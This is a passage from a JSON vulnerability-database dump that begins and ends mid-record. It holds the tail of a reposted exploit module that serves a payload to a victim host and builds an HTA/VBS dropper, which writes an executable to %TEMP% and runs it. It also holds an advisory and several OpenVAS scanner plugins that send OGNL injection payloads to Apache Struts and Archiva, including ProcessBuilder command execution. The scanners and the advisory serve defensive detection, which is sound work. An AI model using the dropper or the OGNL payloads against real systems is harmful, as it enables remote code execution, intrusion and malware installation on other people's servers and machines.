generate_payload_exe({:code => p.encoded, :platform => my_target.platform, :arch => my_target.arch})\r\n\r\n if my_target.name =~ /Linux/\r\n if datastore['PAYLOAD'] =~ /windows/\r\n fail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Linux, but you've selected a Windows payload!\")\r\n end\r\n exploit_linux\r\n elsif my_target.name =~ /Windows/\r\n if datastore['PAYLOAD'] =~ /linux/\r\n fail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Windows, but you've selected a Linux payload!\")\r\n end\r\n exploit_windows\r\n end\r\n end\r\n\r\n # Handle incoming requests from the server\r\n def on_request_uri(cli, request)\r\n vprint_status(\"#{rhost}:#{rport} - URI requested: #{request.inspect}\")\r\n if (not @pl)\r\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\r\n return\r\n end\r\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\r\n @pl_sent = true\r\n send_response(cli, @pl)\r\n end\r\n\r\n # wait for the data to be sent\r\n def wait_payload\r\n print_status(\"#{rhost}:#{rport} - Waiting for the victim to request the payload...\")\r\n\r\n waited = 0\r\n while (not @pl_sent)\r\n select(nil, nil, nil, 1)\r\n waited += 1\r\n if (waited > datastore['HTTP_DELAY'])\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?\")\r\n end\r\n end\r\n end\r\n\r\n def build_hta\r\n var_shellobj = rand_text_alpha(rand(5)+5);\r\n var_fsobj = rand_text_alpha(rand(5)+5);\r\n var_fsobj_file = rand_text_alpha(rand(5)+5);\r\n var_vbsname = rand_text_alpha(rand(5)+5);\r\n var_writedir = rand_text_alpha(rand(5)+5);\r\n\r\n var_origLoc = rand_text_alpha(rand(5)+5);\r\n var_byteArray = rand_text_alpha(rand(5)+5);\r\n var_writestream = rand_text_alpha(rand(5)+5);\r\n var_strmConv = rand_text_alpha(rand(5)+5);\r\n\r\n # Doing in this way to bypass the ADODB.Stream restrictions on JS,\r\n # even when executing it as an \"HTA\" application\r\n # The encoding code has been stolen from ie_unsafe_scripting.rb\r\n print_status(\"#{rhost}:#{rport} - Encoding payload into vbs/javascript/hta...\");\r\n\r\n # Build the content that will end up in the .vbs file\r\n vbs_content = Rex::Text.to_hex(%Q|\r\nDim #{var_origLoc}, s, #{var_byteArray}\r\n#{var_origLoc} = SetLocale(1033)\r\n|)\r\n # Drop the exe payload into an ansi string (ansi ensured via SetLocale above)\r\n # for conversion with ADODB.Stream\r\n vbs_ary = []\r\n # The output of this loop needs to be as small as possible since it\r\n # gets repeated for every byte of the executable, ballooning it by a\r\n # factor of about 80k (the current size of the exe template). In its\r\n # current form, it's down to about 4MB on the wire\r\n @exe.each_byte do |b|\r\n vbs_ary << Rex::Text.to_hex(\"s=s&Chr(#{(\"%d\" % b)})\\n\")\r\n end\r\n vbs_content << vbs_ary.join(\"\")\r\n\r\n # Continue with the rest of the vbs file;\r\n # Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent\r\n # Then use ADODB.Stream again to write the binary to file.\r\n #print_status(\"Finishing vbs...\");\r\n vbs_content << Rex::Text.to_hex(%Q|\r\nDim #{var_strmConv}, #{var_writedir}, #{var_writestream}\r\n#{var_writedir} = WScript.CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%TEMP%\") & \"\\\\#{@var_exename}\"\r\n\r\nSet #{var_strmConv} = CreateObject(\"ADODB.Stream\")\r\n\r\n#{var_strmConv}.Type = 2\r\n#{var_strmConv}.Charset = \"x-ansi\"\r\n#{var_strmConv}.Open\r\n#{var_strmConv}.WriteText s, 0\r\n#{var_strmConv}.Position = 0\r\n#{var_strmConv}.Type = 1\r\n#{var_strmConv}.SaveToFile #{var_writedir}, 2\r\n\r\nSetLocale(#{var_origLoc})|)\r\n\r\n hta = <<-EOS\r\n <script>\r\n var #{var_shellobj} = new ActiveXObject(\"WScript.Shell\");\r\n var #{var_fsobj} = new ActiveXObject(\"Scripting.FileSystemObject\");\r\n var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings(\"%TEMP%\");\r\n var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\",2,true);\r\n\r\n #{var_fsobj_file}.Write(unescape(\"#{vbs_content}\"));\r\n #{var_fsobj_file}.Close();\r\n\r\n #{var_shellobj}.run(\"wscript.exe \" + #{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\", 1, true);\r\n #{var_shellobj}.run(#{var_writedir} + \"\\\\\\\\\" + \"#{@var_exename}\", 0, false);\r\n #{var_fsobj}.DeleteFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\");\r\n window.close();\r\n </script>\r\n EOS\r\n\r\n return hta\r\n end\r\n\r\n\r\nend\n\n# 0day.today [2018-04-13] #", "sourceHref": "https://0day.today/exploit/21032", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-04T18:46:19", "description": "An unauthenticated remote code execution vulnerability was found in the LISTSERV Maestro software, versions 9.0-8 and below. This vulnerability stems from a known issue in struts, CVE-2010-1870, that allows for code execution via OGNL Injection. This vulnerability has been confirmed to be exploitable in both the Windows and Linux version of the software and has existed in the LISTSERV Maestro software since at least version 8.1-5. As a result, a specially crafted HTTP request can be constructed that executes code in the context of the web application. Exploitation of this vulnerability does not require authentication and can lead to root level privilege on any system running the LISTServ Maestro services.", "cvss3": {}, "published": "2020-10-21T00:00:00", "type": "zdt", "title": "LISTSERV Maestro 9.0-8 Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870"], "modified": "2020-10-21T00:00:00", "id": "1337DAY-ID-35084", "href": "https://0day.today/exploit/description/35084", "sourceData": "Document Title:\n\n===============\n\nLISTSERV Maestro Remote Code Execution Vulnerability\n\n \n\nReferences (Source):\n\n====================\n\nhttps://www.securifera.com/advisories/sec-2020-0001/\n\nhttps://www.lsoft.com/products/maestro.asp\n\n \n\nRelease Date:\n\n=============\n\n2020-10-20\n\n \n\nProduct & Service Introduction:\n\n===============================\n\nLISTSERV Maestro is an enterprise email marketing solution and allows you to\neasily engage your subscribers with targeted, intelligence-based opt-in\ncampaigns. It offers easy tracking, reporting and list segmentation in a\ncomplete email marketing and analytics package.\n\n \n\n \n\nVulnerability Information:\n\n==============================\n\nClass: CWE-917 : Expression Language (EL) Injection\n\nImpact: Remote Code Execution\n\nRemotely Exploitable: Yes\n\nLocally Exploitable: Yes\n\nCVE Name: CVE-2010-1870\n\n \n\nVulnerability Description:\n\n==============================\n\nA unauthenticated remote code execution vulnerability was found in the\nLISTSERV Maestro software, version 9.0-8 and prior. This vulnerability stems\nfrom a known issue in struts, CVE-2010-1870, that allows for code execution\nvia OGNL Injection. This vulnerability has been confirmed to be exploitable\nin both the Windows and Linux version of the software and has existed in the\nLISTSERV Maestro software since at least version 8.1-5. As a result, a\nspecially crafted HTTP request can be constructed that executes code in the\ncontext of the web application. Exploitation of this vulnerability does not\nrequire authentication and can lead to root level privilege on any system\nrunning the LISTServ Maestro services.\n\n \n\nVulnerability Disclosure Timeline:\n\n==================================\n\n2020-10-12: Contact Vendor and Request Security Contact Info From Support\nTeam\n\n2020-10-12: Report Vulnerability Information to Vendor\n\n2020-10-12: Vendor Confirms Submission\n\n2020-10-13: Vendor Releases Patch\n\n2020-10-13: Securifera Confirms With Vendor that the Patch Mitigates\nCVE-2010-1870 but suggest upgrading vulnerable struts library\n\n2020-10-15: Vendor Approves Public Disclosure\n\n \n\n \n\nAffected Product(s):\n\n====================\n\nLISTSERV Maestro 9.0-8 and prior\n\n \n\nSeverity Level:\n\n===============\n\nHigh\n\n \n\nProof of Concept (PoC):\n\n=======================\n\nA proof of concept will not be provided at this time.\n\n \n\nSolution - Fix & Patch:\n\n=======================\n\nTemporary patch:\nhttps://dropbox.lsoft.us/download/LMA9.0-8-patch-2020-10-13.zip\n", "sourceHref": "https://0day.today/exploit/35084", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2018-01-15T13:08:51", "description": "This host is running Apache Struts2 and\n is prone to arbitrary java method execution vulnerabilities.", "cvss3": {}, "published": "2013-07-23T00:00:00", "type": "openvas", "title": "Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2018-01-11T00:00:00", "id": "OPENVAS:803837", "href": "http://plugins.openvas.org/nasl.php?oid=803837", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts2_java_method_exec_vuln.nasl 8373 2018-01-11 10:29:41Z cfischer $\n#\n# Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_id(803837);\n script_version(\"$Revision: 8373 $\");\n script_cve_id(\"CVE-2013-1966\", \"CVE-2013-2115\");\n script_bugtraq_id(60166, 60167);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-11 11:29:41 +0100 (Thu, 11 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-07-23 17:54:59 +0530 (Tue, 23 Jul 2013)\");\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_name(\"Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities\");\n\n script_tag(name: \"summary\" , value:\"This host is running Apache Struts2 and\n is prone to arbitrary java method execution vulnerabilities.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send a crafted data like system functions\n via HTTP POST request and check whether it is executing the java function or not.\");\n\n script_tag(name: \"insight\" , value:\"Flaw is due to improper handling of the\n includeParams attribute in the URL and Anchor tags\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow remote attackers\n to execute arbitrary commands via specially crafted OGNL (Object-Graph Navigation Language)\n expressions.\n\n Impact Level: Application\");\n\n script_tag(name: \"affected\" , value:\"Apache Struts 2 before 2.3.14.2\");\n\n script_tag(name: \"solution\" , value:\"Upgrade to Apache Struts 2 version 2.3.14.2 or later,\n For updates refer to http://struts.apache.org\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/53553\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/25980\");\n script_xref(name : \"URL\" , value : \"https://cwiki.apache.org/confluence/display/WW/S2-013\");\n script_xref(name : \"URL\" , value : \"http://struts.apache.org/development/2.x/docs/s2-014.html\");\n script_xref(name : \"URL\" , value : \"http://metasploit.org/modules/exploit/multi/http/struts_include_params\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\n## Variable Initialization\nasport = 0;\nasreq = \"\";\nasres = \"\";\nasRes = \"\";\nasReq = \"\";\ndir = \"\";\nurl = \"\";\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nhost = http_host_name(port:asport);\n\n## Send and Receive the response\nasreq = http_get(item:string(dir,\"/example/HelloWorld.action\"), port:asport);\nasres = http_keepalive_send_recv(port:asport, data:asreq);\n\n## Confirm the application\nif(asres && \">Struts\" >< asres && \">English<\" >< asres)\n{\n sleep = make_list(3, 5);\n\n foreach i (sleep)\n {\n ## Construct the POST data\n postdata = \"fgoa=%24%7b%23%5fmemberAccess%5b%22allow\"+\n \"StaticMethodAccess%22%5d%3dtrue%2c%40jav\"+\n \"a.lang.Thread%40sleep%28\"+ i +\"000%29%7d\";\n\n ## Construct the POST request\n asReq = string(\"POST /struts2-blank/example/HelloWorld.action HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n\n start = unixtime();\n asRes = http_send_recv(port:asport, data:asReq);\n stop = unixtime();\n\n if(stop - start < i || stop - start > (i+5)) exit(0); # not vulnerable\n }\n security_message(port:asport);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-05-12T17:27:36", "description": "This host is running Apache Struts2 and\n is prone to arbitrary java method execution vulnerabilities.", "cvss3": {}, "published": "2013-07-23T00:00:00", "type": "openvas", "title": "Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities (S2-013, S2-014)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310803837", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803837", "sourceData": "# Copyright (C) 2013 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803837\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2013-1966\", \"CVE-2013-2115\");\n script_bugtraq_id(60166, 60167);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-07-23 17:54:59 +0530 (Tue, 23 Jul 2013)\");\n script_name(\"Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities (S2-013, S2-014)\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"ApacheStruts/installed\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/53553\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/25980\");\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-013\");\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-014\");\n script_xref(name:\"URL\", value:\"http://metasploit.org/modules/exploit/multi/http/struts_include_params\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts2 and\n is prone to arbitrary java method execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data like system functions\n via HTTP POST request and check whether it is executing the java function or not.\");\n\n script_tag(name:\"insight\", value:\"Flaw is due to improper handling of the\n includeParams attribute in the URL and Anchor tags\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers\n to execute arbitrary commands via specially crafted OGNL (Object-Graph Navigation Language)\n expressions.\");\n\n script_tag(name:\"affected\", value:\"Struts 2.0.0 - Struts 2.3.14.1.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to at least Struts 2.3.14.2.\");\n\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!port = get_app_port(cpe:CPE, service:\"www\"))\n exit(0);\n\nif(!dir = get_app_location(cpe:CPE, port:port))\n exit(0);\n\nif(dir == \"/\")\n dir = \"\";\n\nuseragent = http_get_user_agent();\nhost = http_host_name(port:port);\n\nreq = http_get(item:dir + \"/example/HelloWorld.action\", port:port);\nres = http_keepalive_send_recv(port:port, data:req);\n\nif(res && \">Struts\" >< res && \">English<\" >< res)\n{\n sleep = make_list(3, 5);\n\n url = dir + \"/struts2-blank/example/HelloWorld.action\";\n foreach i (sleep)\n {\n postdata = \"fgoa=%24%7b%23%5fmemberAccess%5b%22allow\" +\n \"StaticMethodAccess%22%5d%3dtrue%2c%40jav\" +\n \"a.lang.Thread%40sleep%28\" + i + \"000%29%7d\";\n\n req = string(\"POST \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n\n start = unixtime();\n http_send_recv(port:port, data:req);\n stop = unixtime();\n\n if(stop - start < i || stop - start > (i+5)) exit(99); # not vulnerable\n }\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:12", "description": "Apache Archiva is prone to multiple remote command-execution\nvulnerabilities.", "cvss3": {}, "published": "2014-01-15T00:00:00", "type": "openvas", "title": "Apache Archiva Multiple Remote Command Execution Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2251"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310103883", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103883", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_archivo_rce_01_14.nasl 11867 2018-10-12 10:48:11Z cfischer $\n#\n# Apache Archiva Multiple Remote Command Execution Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:apache:archiva\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103883\");\n script_cve_id(\"CVE-2013-2251\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 11867 $\");\n\n script_name(\"Apache Archiva Multiple Remote Command Execution Vulnerabilities\");\n\n\n script_xref(name:\"URL\", value:\"http://cxsecurity.com/issue/WLB-2014010087\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/release/2.3.x/docs/s2-016.html\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:48:11 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-01-15 18:13:42 +0100 (Wed, 15 Jan 2014)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_archiva_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"apache_archiva/installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploits will allow remote attackers to execute arbitrary\ncommands within the context of the affected application.\");\n script_tag(name:\"vuldetect\", value:\"Send a special crafted HTTP GET request and check the response.\");\n script_tag(name:\"insight\", value:\"Apache Archiva use Apache Struts2:\n'In Struts 2 before 2.3.15.1 the information following 'action:', 'redirect:' or\n'redirectAction:' is not properly sanitized. Since said information will be evaluated as\nOGNL expression against the value stack, this introduces the possibility to inject server\nside code.'\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"summary\", value:\"Apache Archiva is prone to multiple remote command-execution\nvulnerabilities.\");\n script_tag(name:\"affected\", value:\"Apache Archiva <= 1.3.6\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\n\nif( ! port = get_app_port(cpe:CPE) ) exit (0);\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) exit (0);\n\ncmds = exploit_commands();\n\nforeach cmd ( keys( cmds ) )\n{\n url = dir +\n '/security/login.action?redirect:' +\n '${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%27' +\n cmds[cmd] +\n '%27})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b)' +\n ',%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23' +\n 'matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23' +\n 'matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}';\n\n if( buf = http_vuln_check( port:port, url:url, pattern:cmd, bodyonly:TRUE ) )\n {\n buf = str_replace( string:buf, find:raw_string( 0x00 ), replace:\"\");\n report = 'It was possible to execute the command \"' + cmds[cmd] + '\" on the remote\\nhost which produces the following output:\\n\\n' + buf + '\\n';\n security_message( port:port, data: report );\n exit (0);\n }\n}\n\nexit (99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-12T17:33:12", "description": "This host is running Struts and is prone to\n remote command execution vulnerability.", "cvss3": {}, "published": "2010-12-21T00:00:00", "type": "openvas", "title": "Apache Struts2/XWork Remote Command Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310801663", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801663", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2/XWork Remote Command Execution Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801663\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2010-1870\");\n script_bugtraq_id(41592);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-12-21 15:42:46 +0100 (Tue, 21 Dec 2010)\");\n script_name(\"Apache Struts2/XWork Remote Command Execution Vulnerability\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"ApacheStruts/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/14360/\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/2.2.1/docs/s2-005.html\");\n script_xref(name:\"URL\", value:\"http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html\");\n\n script_tag(name:\"summary\", value:\"This host is running Struts and is prone to\n remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP POST request\n and check whether it is is able to execute remote code or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error in 'OGNL' extensive\n expression evaluation capability in XWork in Struts, uses as permissive whitelist,\n which allows remote attackers to modify server-side context objects and bypass the '#'\n protection mechanism in ParameterInterceptors via various variables.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to\n manipulate server-side context objects with the privileges of the user running the application.\");\n\n script_tag(name:\"affected\", value:\"Struts version 2.0.0 through 2.1.8.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Struts version 2.2 or later.\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://struts.apache.org/download.cgi\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );\n\nif( dir == \"/\" ) dir = \"\";\nurl = dir + \"/example/HelloWorld.action\";\n\nreq = http_get( item:url, port:port );\nres = http_keepalive_send_recv( port:port, data:req );\n\nif( \"<title>Struts\" >< res ) {\n\n ## OGNL (Object Graph Navigation Language)\n ognl = \"?('\\\\u0023_memberAccess[\\\\'allowStaticMethodAccess\\\\']')(meh)=true&(aaa)(('\"+\n \"\\\\u0023context[\\\\'xwork.MethodAccessor.denyMethodExecution\\\\']\\\\u003d\\\\u0023\" +\n \"foo')(\\\\u0023foo\\\\u003dnew%20java.lang.Boolean('false')))&(asdf)(('\\\\u0023\" +\n \"rt.exit(1)')(\\\\u0023rt\\\\u003d@java.lang.Runtime@getRuntime()))=1\";\n url += ognl;\n\n if( http_vuln_check( port:port, url:url, pattern:'<a href=\".*xwork.MethodAccessor.denyMethodExecution', check_header:TRUE ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:40:12", "description": "This host is running Struts and is prone to remote command\n execution vulnerability.", "cvss3": {}, "published": "2010-09-10T00:00:00", "type": "openvas", "title": "Struts Remote Command Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2019-03-01T00:00:00", "id": "OPENVAS:1361412562310801441", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801441", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_remote_cmd_exec_vuln.nasl 13960 2019-03-01 13:18:27Z cfischer $\n#\n# Struts 